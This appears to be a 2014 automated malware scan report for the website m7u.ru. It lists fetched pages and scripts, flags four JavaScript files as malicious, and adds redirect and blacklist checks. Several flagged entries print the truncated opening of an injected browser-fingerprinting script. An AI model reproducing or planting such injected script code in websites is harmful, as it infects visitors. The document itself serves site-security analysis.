Scanned pages/files
Request | Server response | Status |
http://m7u.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 24 Jun 2014 23:29:11 GMT Location: http://www.m7u.ru/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.28 | clean |
http://www.m7u.ru/ | 200 OK Content-Length: 58128 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js | 200 OK Content-Length: 66079 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js | 200 OK Content-Length: 55740 Content-Type: text/javascript | clean |
http://www.m7u.ru/modules/mod_jt_slideshow/scripts/jquery.cycle.all.min.js | 200 OK Content-Length: 30567 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is truncated mid-string at […], and the same opening block is shown for every file flagged on this page: (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo […] Antivirus reports:
| ||
http://www.m7u.ru/modules/mod_jt_slideshow/scripts/jquery.easing.1.3.js | 200 OK Content-Length: 9867 Content-Type: application/x-javascript | clean |
http://www.m7u.ru/modules/mod_jt_slideshow/scripts/jquery.easing.compatibility.js | 200 OK Content-Length: 3496 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt shows the start of the flagged block, truncated mid-string at […], followed by what appears to be the end of the file's regular code: (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo […] return jQuery.easing.easeOutElastic(x, t, b, c, d); }, elasinout: function(x, t, b, c, d) { return jQuery.easing.easeInOutElastic(x, t, b, c, d); }, backin: function(x, t, b, c, d) { return jQuery.easing.easeInBack(x, t, b, c, d); }, backout: function(x, t, b, c, d) { return jQuery.easing.easeOutBack(x, t, b, c, d); }, backinout: function(x, t, b, c, d) { return jQuery.easing.easeInOutBack(x, t, b, c, d); } }); Antivirus reports:
| ||
http://www.m7u.ru/templates/jv_mojow/js/jv.script.js | 200 OK Content-Length: 3045 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt shows the start of the flagged block, truncated mid-string at […], followed by what appears to be the end of the file's regular code: (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo […] settings['colors'] = jvpathcolor + 'green.css'; StyleCookie.empty(); StyleCookie.extend(settings); });} if($('jvcolor3')){$('jvcolor3').addEvent('click', function(e) { e = new Event(e).stop(); if (style_1) style_1.remove(); new Asset.css(jvpathcolor + 'red.css', {id: 'red'}); style_1 = $('red'); settings['colors'] = jvpathcolor + 'red.css'; StyleCookie.empty(); StyleCookie.extend(settings); });} }); Antivirus reports:
| ||
http://m7u.ru/plugins/system/CssJsCompress/js.php?js=8e28ca95f9cae74c4ce2a900bee52c7f.js | 200 OK Content-Length: 60450 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt shows the start of the flagged block, truncated mid-string at […], followed by what appears to be the end of the file's regular code: (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo […] } el.vml.image.shape.fillcolor = 'none'; el.vml.image.fill.type = 'tile'; el.vml.color.fill.on = false; lib.attachHandlers(el); lib.giveLayout(el); lib.giveLayout(el.offsetParent); lib.applyVML(el); } }; try { document.execCommand("BackgroundImageCache", false, true); } catch(r) {} ie_png.createVmlNameSpace(); ie_png.createVmlStyleSheet(); Antivirus reports:
| ||
http://jd.revolvermaps.com/r.js | 200 OK Content-Length: 2365 Content-Type: application/javascript | clean |
http://counter.rambler.ru/top100.jcn?2471059 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://m7u.ru/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 24 Jun 2014 23:29:14 GMT Location: http://www.m7u.ru/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.28 | clean |
http://www.m7u.ru/test404page.js | 404 Not Found Content-Length: 20891 Content-Type: text/html | clean |
http://www.m7u.ru/js/jquery/jquery-1.4.4.min.js | 404 Not Found Content-Length: 20891 Content-Type: text/html | clean |
http://www.m7u.ru/js/site_navigation.js | 404 Not Found Content-Length: 20891 Content-Type: text/html | clean |
http://www.m7u.ru/js/ | 404 Компонент не найден Content-Length: 1844 Content-Type: text/html | clean |
http://www.m7u.ru/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 24 Jun 2014 23:29:15 GMT Location: http://www.m7u.ru/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.28 | clean |
http://m7u.ru/component/user/register.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 24 Jun 2014 23:29:15 GMT Location: http://www.m7u.ru/component/user/register.html Server: nginx Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.28 | clean |
http://www.m7u.ru/component/user/register.html | 200 OK Content-Length: 40816 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: m7u.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 24 Jun 2014 23:29:11 GMT
Location: http://www.m7u.ru/
Server: nginx
Content-Length: 0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.28
...0 bytes of data.
GET / HTTP/1.1
Host: m7u.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 24 Jun 2014 23:29:11 GMT
Location: http://www.m7u.ru/
Server: nginx
Content-Length: 0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.28
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: m7u.ru
Referer: http://www.google.com/search?q=m7u.ru
Result:
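The result is similar to the first query. No suspicious redirects were found. This check compares only the HTTP responses, so it does not cover the script files flagged as malicious in the table above, which run in the visitor's browser.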
GET / HTTP/1.1
Host: m7u.ru
Referer: http://www.google.com/search?q=m7u.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=m7u.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://m7u.ru/
Result: m7u.ru is not infected or malware details are not published yet.
Result: m7u.ru is not infected or malware details are not published yet.